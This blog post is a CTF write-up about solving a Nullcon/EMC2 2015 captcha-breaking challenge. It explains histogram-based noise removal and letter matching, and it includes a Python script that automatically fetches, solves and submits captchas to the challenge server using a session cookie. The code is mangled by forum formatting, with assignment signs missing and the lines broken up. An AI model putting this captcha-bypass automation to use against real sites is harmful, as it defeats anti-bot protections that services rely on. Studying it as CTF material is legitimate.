View RSS Feed

Fb1h2s aka Rahul Sasi's Blog

Cracking a Captcha . Nullcon| EMC2 CTF 2015

Rating: 15 votes, 4.80 average.
Last week EMC2/nullcon CTF got over . Even though I really wanted to I did not have enough time to play the ctf. I was/am busy working on my "hacking Drones" research for Nullcon .
http://nullcon.net/website/goa-15/sp...rahul-sasi.php


Last year I was one among the top 30 finilist of EMC2 defenders league and stood 5th in the final ranking.
https://www.facebook.com/photo.php?f...type=1&theater
https://twitter.com/varunsharma14/st...65888308039680


Any way on Sunday night I got bit bored with drones and decided to take a sneak peak at the CTF, but by that time the winners were declared and score board was closed. I went straight to my favorite web and reversing challenges and decide to solve one of those. Web 5 was a captcha sovler for 500 point ands I decided that would be easy.
Name:  10926458_10153215485122454_4416938377600721468_n.jpg
Views: 3352
Size:  16.6 KB

The challenge was to break maximum number of captcha and submit using a given session token in a time frame of 2 minutes.

Analyzing the captcha we easily understand that , there are 5 easily visible colours.
Black == background
dark violet == dots
Gray == lines
Letters == In some form of light violet colors.

Name:  imagedemo.png
Views: 3217
Size:  1.9 KB


Form the look of it, it was an easily crack-able captcha .

This is small AI problem where we need to create a program that could recognize these captchas. We need to teach our AI program what is right and what is
wrong. So the first step is to build a training data set, that goes as an input for our captcha solver . For creating the training data people choose
different methods, they depend on neural networks, Vector Space Search etc. In our current situation we do not have a complicated data set. The captcha is simple and has only [a-z,A-Z ] characters in it.


Building the Training Data set.


Step 1 :

The captcha image we are provided was a PNG file, which is in RGBA mode [Red Green Blue Alpha] . ref: en.wikipedia.org/wiki/RGBA_color_space. We will have to bring it down to a maxium of 255 colour space. And the best way to do that is to
convert the image to gif form png. We will use python PHL module to do that.

"
captcha_image = captcha_image.convert("P")

"

Next step is the find the image pixel concentration . Plot the colour and the respective pixel count.

We can use phil histogram and plot . And we get the following.

[-] Image pixel concentration

0 8344
190 938
53 301
96 184
204 113
205 69
60 24
210 14
211 7
95 4

Here 0 stands for Black and has the most pixel count 8344 followed by color 190. At this point I assumed color 204 and 205 are those that that are used for captcha letters.

Step 2:

Remove the noises from the image. This is easy to do as we can simply remove those pixels that are not used for captcha letters.

Simply plot those captcha letter colors to a new image and remove everything else.

if pix == 204 or pix == 205: # these are the numbers to get
captcha_filtered.putpixel((y,x),0)

Now we would get an image whose background is white with all noises removed.
Name:  10926789_10153215507002454_389180500482001232_o.jpg
Views: 3297
Size:  18.2 KB

Step 3:

Next step is to find the captcha letter spacing, and slice each characters out of the captcha .

This would be easy as we have only three different colours in our new image. 255,204,205 .


Horizontal position where letter start and stop .

|a|s|d|f|e

image 1 Line Spacing is [(5, 13), (35, 43), (65, 73), (95, 102), (125, 133), (155, 163)]
Image 2 Line Spacing is [(5, 13), (35, 43), (66, 73), (96, 102), (125, 133), (155, 163)]

Each letters in the captcha occupied almost the same space .
Cut each characters and place them inside a folder.
Rename each letter images[file name] to there respective letter .
Now we will have a folder with sliced letter named with there respective letter.
Name:  10904415_10153215506997454_4402739535327763108_o.jpg
Views: 3290
Size:  19.3 KB


Final Solution algorithm:

The final algorithm to solve the captcha would be.

a) read a new captcha , session cookie
b) filter noise out
c) Slice filtered captcha and extract each letter
d) compare it with those letters kept in the letter folder and find the best match,
c) best match would be the captcha letter
d) continue for all letters in captcha
e) Submit the full captcha along with session cookie to application
f) fetch new captcha with session cookie, goto step b

Compare two images in Python:

There are multiple ways to compare an image in python .

1) Calculate the root mean square
ref: http://code.activestate.com/recipes/...ng-two-images/

2) Euclidean distance
3) Normalized cross-correlation

We will choose the normalized cross relation.

PHIL module's difference returns the absolute value of the difference between the two images.

ImageChops.difference(image1, image2) ⇒ image

out = abs(image1 - image2)

Our images are in the same shape and size. So this is the best bet.


PHP Code:
from PIL import Image,ImageChops
from operator import itemgetter
import urllib2
,hashlib,time,urllib
import cStringIO
,glob
#we have kept all our letters in this folder 
files_names =  glob.glob("/root/ctf/let/*.*")
#we need to get the captcha at the same time get the session cookie, and use it for all solved captcha request.
response urllib2.urlopen('http://54.165.191.231/imagedemo.php')
cookie response.headers['Set-Cookie']
#print cookie

#lets make 500 request read teach captcha 
for x in range(1,500):
  
  
captcha =""
  
opener urllib2.build_opener()
  
opener.addheaders =[
                    (
'Accept''application/json, text/javascript, */*; q=0.01'),
                    (
'Referer''http://www.garag4hackers.com'),
                    (
'Cookie' ,cookie),]
                  
  
response opener.open('http://54.165.191.231/imagedemo.php')
  
length response.headers['content-length']
  
# read the captch and we will save them with there content length */
  
print "[-] Image Content length " length
  image_read 
response.read()
  
#cStringIO to create an object from memmory
  #image_read = Image.open("/root/ctf/u.png")
  
image_read cStringIO.StringIO(image_read)
  
captcha_image Image.open(image_read)
  
#im = Image.open("/root/ctf/de")
  
captcha_image captcha_image.convert("P")
  
temp = {}
  
captcha_filtered Image.new("P",captcha_image.size,255)

  
#print im.histogram()
  
his captcha_image.histogram()
  
values = {}

  for 
i in range(256):
    
values[i] = his[i]
    
  print 
"[-] Image pixel concentration \n"  
  
for color,concentrate in sorted(values.items(), key=itemgetter(1), reverse=True)[:10]:
    print 
color,concentrate
    
  
for x in range(captcha_image.size[1]):
    for 
y in range(captcha_image.size[0]):
      
pix captcha_image.getpixel((y,x))
      
temp[pix] = pix
      
if pix == 204 or pix == 205# these are the numbers to get
    
captcha_filtered.putpixel((y,x),0)

  
captcha_filtered.save("/root/ctf/images/"+length+".gif")
  
inletter False
  foundletter
=False
  start 
0
  end 
0

  letters 
= []

  for 
y in range(captcha_filtered.size[0]): # slice across
    
for x in range(captcha_filtered.size[1]): # slice down
      
pix captcha_filtered.getpixel((y,x))
      if 
pix != 255:
    
inletter True
    
if foundletter == False and inletter == True:
      
foundletter True
      start 
y

    
if foundletter == True and inletter == False:
      
foundletter False
      end 
y
      letters
.append((start,end))

    
inletter=False
  
  
print "[-] Horizontal Position Where letter start and stop \n"  
  
print letters
  
print "\n"

  
count 0
  
for letter in letters:
    
hashlib.md5()
    
im3 captcha_filtered.crop(( letter[0] , 0letter[1],captcha_filtered.size[1] ))
    
#Match current letter with sample data
    #im3.save("/root/ctf/let/%s.gif"%(m.hexdigest()),quality=95)
    
count += 1
    base 
im3.convert('L')
    
    
#print files_names

    
class Fit:
        
letter None
        difference 


    best 
Fit()

    for 
letter in files_names:
        
#print letter
        
current Fit()
        
current.letter letter

        sample_path 
letter
        
#print sample_path
        
sample Image.open(sample_path).convert('L').resize(base.size)
        
difference ImageChops.difference(basesample)
        
        for 
x in range(difference.size[0]):
            for 
y in range(difference.size[1]):
                
current.difference += difference.getpixel((xy))

        if 
not best.letter or best.difference current.difference:
            
best current
    
    
#final captcha decoded
    
tmp best.letter[14:15]
    
captcha captcha+tmp
  
  
#let us post the captcha to the server along with the session token
  
print "[+] Captcha is "captcha
  url 
'http://54.165.191.231/verify.php'
  
data urllib.urlencode({'solution' captcha.strip(), 'Submit' 'Submit'})
  
req opener.open(urldata)
  
response req.read()
  print 
response 
My program had 97% success rate and after 50 successful entries I got the flag.
GitHub Code: https://github.com/fb1h2s/captcha-cracker
Name:  ctf_final_uploadn.jpg
Views: 3253
Size:  37.4 KB

Ref:http://www.boyter.org/decoding-captchas/
Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: